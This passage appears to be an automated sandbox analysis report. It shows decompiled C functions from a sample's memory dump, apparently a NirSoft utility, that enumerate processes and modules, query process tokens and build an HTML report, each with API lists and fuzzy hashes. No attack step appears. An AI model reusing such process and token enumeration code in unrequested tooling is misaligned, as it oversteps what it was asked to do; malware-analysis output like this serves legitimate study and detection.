                                                                                                                                                                                                                          					_push(_a8);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                          				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
                                                                                                                                                                                                                          				_t106 = _v24;
                                                                                                                                                                                                                          				if(_t106 == 0) {
                                                                                                                                                                                                                          					_t32 =  &_v20; // 0x4059ec
                                                                                                                                                                                                                          					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
                                                                                                                                                                                                                          					_v316 = 0;
                                                                                                                                                                                                                          					memset( &_v315, 0, 0xfe);
                                                                                                                                                                                                                          					_t110 = _t110 + 0x20;
                                                                                                                                                                                                                          					_v16 = 0xff;
                                                                                                                                                                                                                          					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
                                                                                                                                                                                                                          					if(__eflags == 0) {
                                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                                          						CloseHandle(_v20);
                                                                                                                                                                                                                          						if(_v8 != 0) {
                                                                                                                                                                                                                          							FreeLibrary(_v8);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_push( &_v28);
                                                                                                                                                                                                                          					_push( &_a4);
                                                                                                                                                                                                                          					_push( &_v1340);
                                                                                                                                                                                                                          					_push( &_v12);
                                                                                                                                                                                                                          					_push( &_v828);
                                                                                                                                                                                                                          					_a4 = 0xff;
                                                                                                                                                                                                                          					_push( &_v316);
                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                          					_v12 = 0xff;
                                                                                                                                                                                                                          					E0040906D( &_v8, _t117);
                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v316 = 0;
                                                                                                                                                                                                                          				memset( &_v315, 0, 0xff);
                                                                                                                                                                                                                          				_v12 = _t106;
                                                                                                                                                                                                                          				_t110 = _t110 + 0xc;
                                                                                                                                                                                                                          				_a4 = 0;
                                                                                                                                                                                                                          				if(E00408F72( &_v8) == 0) {
                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t93 = GetProcAddress(_v8, "GetTokenInformation");
                                                                                                                                                                                                                          				if(_t93 == 0) {
                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
                                                                                                                                                                                                                          				_t117 = _t94;
                                                                                                                                                                                                                          				if(_t94 == 0) {
                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push( &_v28);
                                                                                                                                                                                                                          				_push( &_v12);
                                                                                                                                                                                                                          				_push( &_v1340);
                                                                                                                                                                                                                          				_push( &_v16);
                                                                                                                                                                                                                          				_push( &_v828);
                                                                                                                                                                                                                          				_push(_v316);
                                                                                                                                                                                                                          				_v16 = 0xff;
                                                                                                                                                                                                                          				goto L8;
                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409AB7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409ACF
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                                                                                                                            • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409B25
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409BC7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                                                                                                                          • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                                                                                                                          • API String ID: 3504373036-27875219
                                                                                                                                                                                                                          • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                                                                                                                          • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409172() {
                                                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                                                          				int _t2;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t5;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *0x4101bc != 0) {
                                                                                                                                                                                                                          					return _t1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t2 = E00405436(L"psapi.dll");
                                                                                                                                                                                                                          				_t5 = _t2;
                                                                                                                                                                                                                          				if(_t5 == 0) {
                                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                                          					return _t2;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
                                                                                                                                                                                                                          					 *0x40f848 = _t2;
                                                                                                                                                                                                                          					if(_t2 != 0) {
                                                                                                                                                                                                                          						_t2 = GetProcAddress(_t5, "EnumProcessModules");
                                                                                                                                                                                                                          						 *0x40f840 = _t2;
                                                                                                                                                                                                                          						if(_t2 != 0) {
                                                                                                                                                                                                                          							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
                                                                                                                                                                                                                          							 *0x40f838 = _t2;
                                                                                                                                                                                                                          							if(_t2 != 0) {
                                                                                                                                                                                                                          								_t2 = GetProcAddress(_t5, "EnumProcesses");
                                                                                                                                                                                                                          								 *0x40fa6c = _t2;
                                                                                                                                                                                                                          								if(_t2 != 0) {
                                                                                                                                                                                                                          									_t2 = GetProcAddress(_t5, "GetModuleInformation");
                                                                                                                                                                                                                          									 *0x40f844 = _t2;
                                                                                                                                                                                                                          									if(_t2 != 0) {
                                                                                                                                                                                                                          										 *0x4101bc = 1;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if( *0x4101bc == 0) {
                                                                                                                                                                                                                          						_t2 = FreeLibrary(_t5);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                          • API String ID: 1182944575-70141382
                                                                                                                                                                                                                          • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                                                                                                                          • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004090EE() {
                                                                                                                                                                                                                          				void* _t1;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t2;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t4;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *0x4101b8 != 0) {
                                                                                                                                                                                                                          					return _t1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                                                                          				_t4 = _t2;
                                                                                                                                                                                                                          				if(_t4 == 0) {
                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                          					return _t2;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                                                                                                                                                          				 *0x40f83c = _t2;
                                                                                                                                                                                                                          				if(_t2 != 0) {
                                                                                                                                                                                                                          					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                                                                                                                                                          					 *0x40f834 = _t2;
                                                                                                                                                                                                                          					if(_t2 != 0) {
                                                                                                                                                                                                                          						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                                                                                                                                                          						 *0x40f830 = _t2;
                                                                                                                                                                                                                          						if(_t2 != 0) {
                                                                                                                                                                                                                          							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                                                                                                                                                          							 *0x40f5c4 = _t2;
                                                                                                                                                                                                                          							if(_t2 != 0) {
                                                                                                                                                                                                                          								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                                                                                                                                                          								 *0x40f828 = _t2;
                                                                                                                                                                                                                          								if(_t2 != 0) {
                                                                                                                                                                                                                          									 *0x4101b8 = 1;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				goto L9;
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                                          • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                                                                                                                          • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                                                          			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				char _v516;
                                                                                                                                                                                                                          				void _v1026;
                                                                                                                                                                                                                          				char _v1028;
                                                                                                                                                                                                                          				void _v1538;
                                                                                                                                                                                                                          				char _v1540;
                                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                                          				intOrPtr* _t50;
                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t50 = __ecx;
                                                                                                                                                                                                                          				_push(0x1fe);
                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                                                                                                                                          					_v1540 = 0;
                                                                                                                                                                                                                          					memset( &_v1538, ??, ??);
                                                                                                                                                                                                                          					_v1028 = 0;
                                                                                                                                                                                                                          					memset( &_v1026, 0, 0x1fe);
                                                                                                                                                                                                                          					_v516 = 0;
                                                                                                                                                                                                                          					memset( &_v514, 0, 0x1fe);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                                                                                                                                                          					if (_t39 != 0) goto L3;
                                                                                                                                                                                                                          					return _t39;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v516 = 0;
                                                                                                                                                                                                                          				memset( &_v514, ??, ??);
                                                                                                                                                                                                                          				_v1028 = 0;
                                                                                                                                                                                                                          				memset( &_v1026, 0, 0x1fe);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                                                                          • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                                                                                                                          • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                                          			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                                                                                                                                                          				void _v8202;
                                                                                                                                                                                                                          				short _v8204;
                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                          				short _t29;
                                                                                                                                                                                                                          				short _t40;
                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                          				struct HMENU__* _t43;
                                                                                                                                                                                                                          				short _t50;
                                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                                          				struct HMENU__* _t59;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x2008, __ecx);
                                                                                                                                                                                                                          				_t65 = _a8 - 4;
                                                                                                                                                                                                                          				if(_a8 != 4) {
                                                                                                                                                                                                                          					__eflags = _a8 - 5;
                                                                                                                                                                                                                          					if(_a8 == 5) {
                                                                                                                                                                                                                          						_t50 =  *0x40fe2c; // 0x0
                                                                                                                                                                                                                          						__eflags = _t50;
                                                                                                                                                                                                                          						if(_t50 == 0) {
                                                                                                                                                                                                                          							L8:
                                                                                                                                                                                                                          							_push(_a12);
                                                                                                                                                                                                                          							_t27 = 5;
                                                                                                                                                                                                                          							E00405E8D(_t27);
                                                                                                                                                                                                                          							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
                                                                                                                                                                                                                          							__eflags = _t29;
                                                                                                                                                                                                                          							_a8 = _t29;
                                                                                                                                                                                                                          							if(_t29 == 0) {
                                                                                                                                                                                                                          								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_v8204 = 0;
                                                                                                                                                                                                                          							memset( &_v8202, 0, 0x2000);
                                                                                                                                                                                                                          							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                                                                                                                                                          							__eflags = _v8204;
                                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                                          								E00405FAC(__eflags, L"caption",  &_v8204, 0);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							EnumChildWindows(_a8, E0040614F, 0);
                                                                                                                                                                                                                          							DestroyWindow(_a8);
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                          								_t40 =  *_t50;
                                                                                                                                                                                                                          								__eflags = _t40;
                                                                                                                                                                                                                          								if(_t40 == 0) {
                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								__eflags = _t40 - _a12;
                                                                                                                                                                                                                          								if(_t40 != _a12) {
                                                                                                                                                                                                                          									_t50 = _t50 + 4;
                                                                                                                                                                                                                          									__eflags = _t50;
                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								goto L13;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_push(_a12);
                                                                                                                                                                                                                          					_t41 = 4;
                                                                                                                                                                                                                          					E00405E8D(_t41);
                                                                                                                                                                                                                          					_pop(_t52);
                                                                                                                                                                                                                          					_t43 = LoadMenuW(_a4, _a12);
                                                                                                                                                                                                                          					 *0x40fe20 =  *0x40fe20 & 0x00000000;
                                                                                                                                                                                                                          					_t59 = _t43;
                                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                                          					_push(_t59);
                                                                                                                                                                                                                          					_push(_a12);
                                                                                                                                                                                                                          					E0040605E(_t52, _t65);
                                                                                                                                                                                                                          					DestroyMenu(_t59);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				L13:
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          0x00406224
                                                                                                                                                                                                                          0x00406224
                                                                                                                                                                                                                          0x00406229
                                                                                                                                                                                                                          0x0040622a
                                                                                                                                                                                                                          0x0040622f
                                                                                                                                                                                                                          0x00406236
                                                                                                                                                                                                                          0x0040623c
                                                                                                                                                                                                                          0x00406243
                                                                                                                                                                                                                          0x00406245
                                                                                                                                                                                                                          0x00406247
                                                                                                                                                                                                                          0x00406248
                                                                                                                                                                                                                          0x0040624b
                                                                                                                                                                                                                          0x00406254
                                                                                                                                                                                                                          0x00406254
                                                                                                                                                                                                                          0x0040632d
                                                                                                                                                                                                                          0x00406334

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadMenuW.USER32 ref: 00406236
                                                                                                                                                                                                                            • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                                                                                                                            • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                                                                                                                            • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                                                                                                                            • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                                                                                                                          • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                                                                                                                          • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004062DA
                                                                                                                                                                                                                          • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                                                                                                                          • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                                                                                                                            • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                                                                                                                          • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                                                                                                                          • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                                                          			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                          				void _v2050;
                                                                                                                                                                                                                          				char _v2052;
                                                                                                                                                                                                                          				void _v4098;
                                                                                                                                                                                                                          				long _v4100;
                                                                                                                                                                                                                          				void _v6146;
                                                                                                                                                                                                                          				char _v6148;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                                                          				intOrPtr* _t49;
                                                                                                                                                                                                                          				intOrPtr* _t57;
                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                          				intOrPtr _t62;
                                                                                                                                                                                                                          				intOrPtr _t63;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t49 = __ecx;
                                                                                                                                                                                                                          				E0040B550(0x1800, __ecx);
                                                                                                                                                                                                                          				_t57 = _t49;
                                                                                                                                                                                                                          				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                                                                                                                                          				_v4100 = 0;
                                                                                                                                                                                                                          				memset( &_v4098, 0, 0x7fe);
                                                                                                                                                                                                                          				_v2052 = 0;
                                                                                                                                                                                                                          				memset( &_v2050, 0, 0x7fe);
                                                                                                                                                                                                                          				_v6148 = 0;
                                                                                                                                                                                                                          				memset( &_v6146, 0, 0x7fe);
                                                                                                                                                                                                                          				_t59 = _t58 + 0x24;
                                                                                                                                                                                                                          				_t62 =  *0x40fe30; // 0x0
                                                                                                                                                                                                                          				if(_t62 != 0) {
                                                                                                                                                                                                                          					_push(0x40fe30);
                                                                                                                                                                                                                          					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                                                                                                                                                          					_push(0x400);
                                                                                                                                                                                                                          					_push( &_v2052);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_t59 = _t59 + 0x10;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t63 =  *0x40fe28; // 0x0
                                                                                                                                                                                                                          				if(_t63 != 0) {
                                                                                                                                                                                                                          					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                                                                                                                                                                          				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
                                                                                                                                                                                                                          				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                                                                                                                                                          				_push(0x400);
                                                                                                                                                                                                                          				_push( &_v6148);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				_t43 = E00407343(_t57, _a4,  &_v6148);
                                                                                                                                                                                                                          				_t64 = _a8 - 5;
                                                                                                                                                                                                                          				if(_a8 == 5) {
                                                                                                                                                                                                                          					return E00407D03(_t57, _t64, _a4);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t43;
                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                          0x004082d2
                                                                                                                                                                                                                          0x004082d3
                                                                                                                                                                                                                          0x004082e7
                                                                                                                                                                                                                          0x004082ec
                                                                                                                                                                                                                          0x004082f0
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004082f5
                                                                                                                                                                                                                          0x004082fe

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
